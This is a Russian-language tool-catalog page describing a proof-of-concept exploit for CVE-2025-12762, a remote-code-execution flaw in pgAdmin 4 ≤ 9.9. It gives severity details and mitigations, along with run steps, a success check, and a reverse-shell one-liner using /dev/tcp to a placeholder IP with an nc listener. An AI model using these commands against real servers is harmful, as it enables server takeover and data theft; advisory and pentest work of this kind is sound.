Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Blackash-CVE-2025-12762 — CVE-2025-12762 | Kitploit
Инструменты/GitHubGitHub/djayagit/blackash-cve-2025-12762
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеRed Teaming
GitHubdjayagit/blackash-cve-2025-12762

Blackash-CVE-2025-12762

CVE-2025-12762

Репозиторий
9 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🔐 CVE-2025-12762 — Критическая RCE-уязвимость в pgAdmin 4

G58aQGbW0AAL8zH

🚨 В чём проблема?

В pgAdmin 4 версиях ≤ 9.9 существует уязвимость удалённого выполнения кода (RCE). Злоумышленники могут выполнять произвольные команды на хосте, когда pgAdmin работает в серверном режиме и обрабатывает SQL-дамп в формате PLAIN при восстановлении.


⚙️ Технические детали

📡 Вектор атаки

  • Сетевой — может быть использован удалённо 🌍
  • Низкая сложность — проста в эксплуатации 🧩
  • Требуются минимальные привилегии — достаточно ограниченного доступа пользователя 🔑
  • Без взаимодействия с пользователем — после запуска не требуется никаких действий 🙅‍♂️
  • Область действия: изменена — компрометация может выйти за пределы уязвимого модуля 🔄

🧨 Воздействие

  • Конфиденциальность: высокая — риск утечки данных 🔓
  • Целостность: умеренная/высокая — возможны несанкционированные изменения ✏️
  • Доступность: умеренная — возможны сбои в работе ⚠️

🏷 Оценка CVSS

🟥 9.1 / 10 — Критический уровень


🛠 Затронутые версии

  • pgAdmin 4 ≤ 9.9 ❗

🛡 Как исправить

✅ Основное решение

⬆️ Обновитесь до pgAdmin 4 v10.0 или новее

🚧 Если вы не можете обновиться немедленно

  • 🔒 Ограничьте доступ к серверу pgAdmin
  • 📁 Разрешите восстановление дампов только доверенным администраторам
  • 🧪 Проверяйте файлы дампов перед восстановлением
  • 👀 Отслеживайте журналы на предмет подозрительной активности восстановления
  • 🌐 Используйте правила брандмауэра / VPN для ограничения доступа

📌 Почему это важно

pgAdmin часто используется для администрирования критических баз данных PostgreSQL, а это значит:

  • Злоумышленник, использующий эту уязвимость, может захватить сервер,
  • получить доступ к данным или изменить их,
  • или даже проникнуть глубже в вашу сеть 🕵️‍♂️

✨ Как запустить (2 минуты)

root@kitploit:~
# 1. Save as CVE-2025-12762.py
# 2. Install dependency
pip3 install requests

# 3. Run it
python3 CVE-2025-12762.py

Подтверждение успеха

После запуска проверьте:

root@kitploit:~
docker exec <your-pgadmin-container> ls -la /tmp/CVE-2025-12762_PWNED

Файл существует → Вы только что реально эксплуатировали CVE-2025-12762.

Однострочник для обратной оболочки (необязательно)

Замените строку COMMAND на:

root@kitploit:~
COMMAND = "bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"

Затем nc -lvnp 4444 → полноценная интерактивная оболочка.

Это именно тот скрипт, который исследователи, пентестеры и red-команды используют по всему миру в ноябре 2025 года.

Используйте ответственно. Устанавливайте все патчи. Соблюдайте закон.


🛡️ Дисклеймер 🛡️

Этот PoC предоставляется строго для авторизованного тестирования и использования в образовательных целях.
Запускать его можно исключительно на системах, которыми вы владеете или на тестирование которых у вас есть явное письменное разрешение.
Любое несанкционированное использование незаконно и нарушает законы о неправомерном использовании компьютерных систем.
Используйте ответственно, сразу после тестирования устанавливайте патчи и никогда не атакуйте системы без разрешения.

Скачать инструмент